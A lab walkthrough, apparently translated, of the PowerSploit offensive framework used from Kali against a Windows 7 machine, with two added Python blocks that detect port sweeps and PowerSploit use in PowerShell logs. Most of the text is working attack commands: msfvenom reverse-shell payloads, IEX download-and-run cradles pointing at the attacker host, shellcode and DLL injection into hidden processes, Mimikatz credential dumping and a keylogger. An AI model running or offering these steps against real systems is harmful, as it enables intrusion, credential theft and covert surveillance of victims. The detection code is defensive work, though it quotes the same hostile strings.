Environment
Kali (192.168.188.128)
win7 (192.168.188.148)
Prerequisites
1. Enter the following git command to install PowerSploit
Command: git clone https://github.com/PowerShellMafia/PowerSploit
Demo:
2. Enter the following command to start the Apache service
Command: service apache2 start
Demo:
3. Move the downloaded folder into the /var/www/html directory so that it is served by a simple web server
Introduction to the PowerSploit modules
1. AntivirusBypass: finds the detection signatures used by antivirus software.
2. CodeExecution: executes code on the target host.
3. Exfiltration: information-collection tools for the target host.
4. Mayhem: blue-screen and other destructive scripts.
5. Persistence: backdoor scripts (persistent control).
6. Recon: uses the target host as a pivot for internal network reconnaissance.
7. ScriptModification: creates or modifies scripts on the target host.
Hands-on practice
I. Invoke-Shellcode
The Invoke-Shellcode script under the CodeExecution module is often used to inject shellcode into a specified process ID or into the local PowerShell process. Here are two commonly used ways to get a reverse Meterpreter shell.
1. Execute the shellcode directly to get a reverse Meterpreter shell
1. Use the reverse_https module in MSF for the reverse connection; the settings are as follows
Command: 1. use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
Demo:
The listener is set up successfully
2. Use the msfvenom command to generate a PowerShell script Trojan
Command: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.188.128 LPORT=4444 -f powershell -o /var/www/html/code
Demo:
The PowerShell script Trojan is generated successfully (Note: be sure the bitness here, 32-bit vs 64-bit, matches the target's PowerShell process, otherwise the reverse shell will not succeed)
3. In PowerShell on the target machine, enter the following command to download the script (run as an administrator)
Command: IEX(New-Object Net.WebClient).DownloadString("http://192.168.188.128/PowerSploit/CodeExecution/Invoke-Shellcode.ps1")
Demo:
4. Then enter the following command to download the Trojan
Command: IEX(New-Object Net.WebClient).DownloadString("http://192.168.188.128/code")
Demo:
5. Then run the Trojan in PowerShell by entering the following command
Command: Invoke-Shellcode -Shellcode ($buf) -Force
Demo:
6. Return to MSF
The reverse shell comes back successfully
2. Inject the shellcode into a specified process to get a reverse Meterpreter shell
1. In PowerShell on the target machine, enter the following commands to download the PowerShell script and the Trojan
Command: IEX(New-Object Net.WebClient).DownloadString("http://192.168.188.128/PowerSploit/CodeExecution/Invoke-Shellcode.ps1")
IEX(New-Object Net.WebClient).DownloadString("http://192.168.188.128/code")
2. Enter the Get-Process command or the ps command to view the current processes
3. Then enter the following command to create a new process; here a notepad is started and set to hidden
Command: Start-Process c:\Windows\system32\notepad.exe -WindowStyle Hidden
You can see that a process named notepad with ID 3816 has been created
4. Then enter the following command to inject into that process with the Invoke-Shellcode script
Command: Invoke-Shellcode -ProcessID 3816 -Shellcode ($buf) -Force
5. Return to MSF and you can see it succeeded
The reverse shell comes back successfully
II. Invoke-DllInjection
The following uses another script under the CodeExecution module, Invoke-DllInjection, which is a DLL injection script.
1. Similarly, download the script first
Command: IEX(New-Object Net.WebClient).DownloadString("http://192.168.188.128/PowerSploit/CodeExecution/Invoke-DllInjection.ps1")
Downloaded successfully
2. Use the following command in Kali to generate the DLL to inject
Command: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.188.128 lport=4444 -f dll -o /var/www/html/test.dll
The DLL is generated successfully
3. After uploading the generated test.dll to the C drive of the target machine, you can start a new process for the DLL injection, which makes the injection more hidden. Use the following command to create a new hidden notepad.exe process
Note: to upload it to the target machine's C drive, I download it directly from the web page
Command: Start-Process c:\Windows\system32\notepad.exe -WindowStyle Hidden
A new process with ID 4268 is created successfully
4. Use the following command to inject
Command: Invoke-DllInjection -ProcessID 4268 -Dll c:\test.dll
5. Return to MSF to check, and the reverse shell comes back successfully
III. Invoke-Portscan
Invoke-Portscan is a script under the Recon module. It is mainly used for port scanning and is relatively simple to use.
1. Still download the script first
Command: IEX(New-Object Net.WebClient).DownloadString("http://192.168.188.128/PowerSploit/Recon/Invoke-Portscan.ps1")
2. Use the following command to scan
Command: Invoke-Portscan -Hosts 192.168.188.148,192.168.188.128 -Ports "80,22,3389"
Scanned successfully
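On the receiving side, a run like the one above shows up as a single source touching several distinct ports on a host within a few seconds, whether or not those ports answer. The Python below is an added example and is not part of the original post or of PowerSploit: it applies a sliding-window check over constructed firewall connection log lines (the line format and every sample entry are invented here) and reports the source/destination pairs that look like a port sweep.

```python
"""Detect a port sweep from connection log lines: one source hitting
many distinct destination ports on one host inside a short time window.
The log format and all sample lines are constructed for this example."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed format: "<ISO timestamp> <src_ip> -> <dst_ip>:<dst_port> <ALLOW|DENY>"
SAMPLE_CONN_LOG = [
    "2024-05-01T10:00:00Z 192.168.188.148 -> 192.168.188.128:80 ALLOW",
    "2024-05-01T10:00:00Z 192.168.188.148 -> 192.168.188.128:22 ALLOW",
    "2024-05-01T10:00:01Z 192.168.188.148 -> 192.168.188.128:3389 DENY",
    "2024-05-01T10:00:01Z 192.168.188.148 -> 192.168.188.128:445 DENY",
    "2024-05-01T10:30:00Z 192.168.188.148 -> 192.168.188.128:80 ALLOW",  # later, unrelated
    "2024-05-01T10:00:05Z 192.168.188.50 -> 192.168.188.128:80 ALLOW",   # a single normal hit
]


def parse_conn(line):
    """Split one constructed log line into (timestamp, src, dst_ip, dst_port, action)."""
    ts, src, _arrow, dst, action = line.split()
    dst_ip, dst_port = dst.rsplit(":", 1)
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, dst_ip, int(dst_port), action


def detect_port_sweeps(lines, min_ports=3, window=timedelta(seconds=60)):
    """Return {(src, dst_ip): sorted_ports} for every source that reached at
    least `min_ports` distinct ports on one host within `window`.
    Denied connections count as well: probing closed ports is still a scan."""
    events = defaultdict(list)  # (src, dst_ip) -> [(timestamp, port), ...]
    for line in lines:
        ts, src, dst_ip, port, _action = parse_conn(line)
        events[(src, dst_ip)].append((ts, port))

    alerts = {}
    for key, hits in events.items():
        hits.sort()  # chronological, so each index can start a window
        for i, (start, _port) in enumerate(hits):
            ports_in_window = {p for t, p in hits[i:] if t - start <= window}
            if len(ports_in_window) >= min_ports:
                alerts[key] = sorted(ports_in_window)
                break  # one alert per pair is enough
    return alerts


if __name__ == "__main__":
    for (src, dst), ports in detect_port_sweeps(SAMPLE_CONN_LOG).items():
        print(f"possible port sweep: {src} -> {dst} ports {ports}")
```

The threshold and window are deliberately small so the constructed sample trips them; on real logs tune `min_ports` and `window` to the environment, and exclude known scanners such as vulnerability-management hosts.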
IV. Invoke-Mimikatz
Invoke-Mimikatz is a script under the Exfiltration module; its function is to grab hashes
1. Still download the script first
Command: IEX(New-Object Net.WebClient).DownloadString("http://192.168.188.128/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1")
2. Execute the following command
Command: Invoke-Mimikatz -DumpCreds
Hashes grabbed successfully
V. Get-Keystrokes
Get-Keystrokes is a keylogger script under the Exfiltration module. It is quite powerful: it not only logs keystrokes but can even record mouse clicks, together with detailed timestamps, and it goes straight to the background when run
1. Still download the script first
Command: IEX(New-Object Net.WebClient).DownloadString("http://192.168.188.128/PowerSploit/Exfiltration/Get-Keystrokes.ps1")
2. Use the following command to turn on keystroke logging; type "Hello" here as a simple test
Command: Get-Keystrokes -LogPath c:\test1.txt
Recorded successfully, but I don't know why there are so many duplicates.
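Every section above follows the same shape on the target: a download cradle (IEX(New-Object Net.WebClient).DownloadString), then a PowerSploit function such as Invoke-Shellcode, Invoke-DllInjection, Invoke-Mimikatz or Get-Keystrokes, sometimes preceded by a hidden Start-Process. With PowerShell script block logging enabled, the executed text lands in the Microsoft-Windows-PowerShell/Operational log as event ID 4104, which is where a defender catches this walkthrough. The Python below is an added example and is not part of the original post or of PowerSploit: it runs a few rules over constructed script block log lines (the pipe-delimited format and every sample line are invented here) and aggregates a per-host score so that a lone cradle is merely suspicious while cradle plus injection plus credential dump escalates.

```python
"""Rule-based detection over PowerShell script block log (event 4104) text for
the PowerSploit usage patterns in this walkthrough. Log format and samples
are constructed for this example; the strings matched come from the commands
shown above."""
import re
from dataclasses import dataclass

# (rule name, pattern, severity). Case-insensitive because PowerShell is.
RULES = [
    ("download_cradle",
     re.compile(r"IEX\s*\(\s*New-Object\s+Net\.WebClient\s*\)\s*\.DownloadString", re.I),
     "medium"),
    ("powersploit_module",
     re.compile(r"\b(Invoke-Shellcode|Invoke-DllInjection|Invoke-Mimikatz|"
                r"Get-Keystrokes|Invoke-Portscan)\b", re.I),
     "high"),
    ("process_injection_args",
     re.compile(r"-ProcessID\s+\d+\s+-(Shellcode|Dll)\b", re.I),
     "high"),
    ("hidden_window_start",
     re.compile(r"Start-Process\b.*-WindowStyle\s+Hidden", re.I),
     "low"),
    ("credential_dump",
     re.compile(r"-DumpCreds\b", re.I),
     "high"),
]

SEVERITY_WEIGHT = {"low": 1, "medium": 3, "high": 5}


@dataclass
class Finding:
    timestamp: str
    host: str
    rule: str
    severity: str
    excerpt: str


def parse_line(line):
    """Constructed format: '<timestamp>|<host>|<event id>|<script block text>'."""
    ts, host, event_id, text = line.split("|", 3)
    return {"timestamp": ts, "host": host, "event_id": int(event_id), "text": text}


def scan_script_blocks(lines):
    """Return one Finding per (4104 event, matching rule)."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec["event_id"] != 4104:  # only script block text is inspected
            continue
        for name, pattern, severity in RULES:
            match = pattern.search(rec["text"])
            if match:
                findings.append(Finding(rec["timestamp"], rec["host"], name,
                                        severity, match.group(0)))
    return findings


def score_host(findings):
    """Sum severity weights per host so chained activity stands out."""
    totals = {}
    for f in findings:
        totals[f.host] = totals.get(f.host, 0) + SEVERITY_WEIGHT[f.severity]
    return totals


# Constructed sample log; the win7 lines mirror the commands in the walkthrough.
SAMPLE_LOG = [
    '2024-05-01T09:00:01Z|win7|4104|Get-Process',
    '2024-05-01T09:00:10Z|win7|4104|IEX(New-Object Net.WebClient).DownloadString("http://192.168.188.128/PowerSploit/CodeExecution/Invoke-Shellcode.ps1")',
    '2024-05-01T09:00:12Z|win7|4104|IEX(New-Object Net.WebClient).DownloadString("http://192.168.188.128/code")',
    r'2024-05-01T09:00:20Z|win7|4104|Start-Process c:\Windows\system32\notepad.exe -WindowStyle Hidden',
    '2024-05-01T09:00:25Z|win7|4104|Invoke-Shellcode -ProcessID 3816 -Shellcode ($buf) -Force',
    '2024-05-01T09:01:00Z|win7|4104|Invoke-Mimikatz -DumpCreds',
    r'2024-05-01T09:02:00Z|admin-pc|4104|Get-ChildItem C:\Users | Measure-Object',
    '2024-05-01T09:03:00Z|admin-pc|4103|Invoke-Shellcode',  # not a 4104 event, ignored
]

if __name__ == "__main__":
    hits = scan_script_blocks(SAMPLE_LOG)
    for f in hits:
        print(f"{f.timestamp} {f.host} [{f.severity}] {f.rule}: {f.excerpt}")
    print("host scores:", score_host(hits))
```

The rules are intentionally literal; real attackers rename functions and obfuscate the cradle, so treat this as a starting point and pair it with the logging prerequisites (script block logging, and 4104 forwarding to a collector) rather than as a complete detection.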
A fairly successful end